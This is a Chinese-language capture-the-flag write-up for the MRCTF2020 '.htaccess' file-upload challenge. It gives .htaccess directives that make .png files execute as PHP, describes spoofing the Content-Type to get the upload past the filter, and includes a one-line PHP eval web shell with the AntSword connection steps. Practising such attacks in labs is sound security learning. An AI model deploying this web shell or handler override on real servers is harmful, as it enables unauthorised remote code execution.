[MRCTF2020]你傳你🐎呢之.htaccess
前言
最近,也是遇到了文件上傳的文件,自己搭的靶場都不能用,今天,在這裡又遇到了這個題。簡單總結下,內容來自互聯網,若有侵權,聯繫我。
.htaccess簡介
.htaccess文件(分散式配置文件),提供了針對目錄改變配置的方法, 就是在一個特定的文件目錄中放置一個包含多個指令的文件,以作用於此
目 錄及其子目錄。作為用戶,所能使用的命令受到限制。管理員可以通過Apache 的allowOverride指令來設置。httpd.conf文件中設置
.htaccess的利用
將下面的內容寫入.htaccess
0x01
這裡時是要包含bbb的文件,都會被當成php程式碼執行
<FilesMatch "bbb"> SetHandler application/x-httpd-php </FilesMatch>
0x02
這種方法時,後面的.png文件能被當成php程式碼執行,如果想換成別的改擴展名就可以
AddType application/x-httpd-php .png
賽題詳解
這裡我們的思路是,將.htaccess文件上傳時,抓包,然後改Content-Type的類型為 image/jpeg的形式上傳,當然這道題,image/png的
文件類型也可以上傳,至於gif可不可以我沒有試,感覺應該可以。然後先上傳.htaccess文件,然後上傳圖片🐎,通過蟻劍去連接。好了,
廢話不多說了下面我們開始做題吧
0x01 上傳.htaccess文件
來到題目的頁面,我們上傳.htaccess,然後抓包改Content-Type的值,改成image/jpeg,然後放包。這裡我們用的是第二種
0x02 上傳圖片🐎
改完之後,我們再繼續上傳圖片🐎就可以。當然要是以.png的後綴名文件。
bbb.png內容:
<?php eval($_POST['hack']);?>
我們在這裡上傳的是bbb.png文件
得到這個路徑,我們需要的是首頁的url拼接上upload後面的路徑:/upload/4c1f01c73cb453aec997d1699d8f0e75/bbb.png
0x03 蟻劍連接
然後通過蟻劍連接,密碼為hack。然後在根目錄下發現flag
這樣,我們這道題就完成了。
總結一下,對這個.htaccess又加深了了解,不錯,頭疼了好幾天,之前上傳這個沒一個成功的。好了謝謝大家的觀看。覺得好的可以給個推薦,什麼的。